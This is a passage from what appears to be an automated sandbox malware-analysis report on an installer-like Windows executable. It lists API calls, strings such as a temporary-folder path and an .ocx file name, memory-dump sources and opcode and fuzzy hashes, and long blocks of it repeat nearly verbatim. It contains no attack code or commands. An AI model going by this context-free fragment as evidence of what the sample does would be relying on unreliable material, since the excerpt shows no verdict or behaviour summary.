                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                  • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                  • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                  • MulDiv.KERNEL32(000BD91A,00000064,000BD91E), ref: 00402E3C
                                  • wsprintfW.USER32 ref: 00402E4C
                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402E46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: 8cfea930059ce5e69f8165424db4b58b8f2fb7459e8da0d31a2866ee00cce53b
                                  • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                  • Opcode Fuzzy Hash: 8cfea930059ce5e69f8165424db4b58b8f2fb7459e8da0d31a2866ee00cce53b
                                  • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                  • String ID:
                                  • API String ID: 2667972263-0
                                  • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                  • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                  • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                  • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834
                                  • GetLastError.KERNEL32 ref: 00405848
                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                  • GetLastError.KERNEL32 ref: 00405867
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 3449924974-3370423016
                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                  • Instruction ID: 56aaffc7fd545305371b439287a03fd7ccaf004a29b63406c0e33255b185a1b6
                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                  • Instruction Fuzzy Hash: 90011A72D00619EADF00DFA1C944BEFBBB8EF14354F00843AE945B6281D7789618CFA9
                                  APIs
                                  • GetDC.USER32(?), ref: 00401DBC
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                  • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                  • String ID:
                                  • API String ID: 3808545654-0
                                  • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                  • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                  • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                  • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                  APIs
                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: 0f39d9f12d53ff93ed05ad22e5c2654e25c024a76bc5e8eaad46146554dabe63
                                  • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                  • Opcode Fuzzy Hash: 0f39d9f12d53ff93ed05ad22e5c2654e25c024a76bc5e8eaad46146554dabe63
                                  • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                  APIs
                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                  • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                  • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                  • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Users\user\Desktop\xerophily.ocx,00000400,?,?,00000021), ref: 004025E8
                                  • lstrlenA.KERNEL32(C:\Users\user\Desktop\xerophily.ocx,?,?,0040B5D0,000000FF,C:\Users\user\Desktop\xerophily.ocx,00000400,?,?,00000021), ref: 004025F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWidelstrlen
                                  • String ID: C:\Users\user\Desktop\xerophily.ocx
                                  • API String ID: 3109718747-1740715928
                                  • Opcode ID: 18a92599d19568ff8bc05a4b5855478ddca432145c4c7b47034acc93206d5566
                                  • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                  • Opcode Fuzzy Hash: 18a92599d19568ff8bc05a4b5855478ddca432145c4c7b47034acc93206d5566
                                  • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                  APIs
                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405BB1
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-3355392842
                                  • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                  • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                  • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                  • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                  APIs
                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd
                                  Similarity
                                  • API ID: Close$Enum
                                  • String ID:
                                  • API String ID: 464197530-0
                                  • Opcode ID: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                  • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                  • Opcode Fuzzy Hash: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                  • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                  APIs
                                  • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
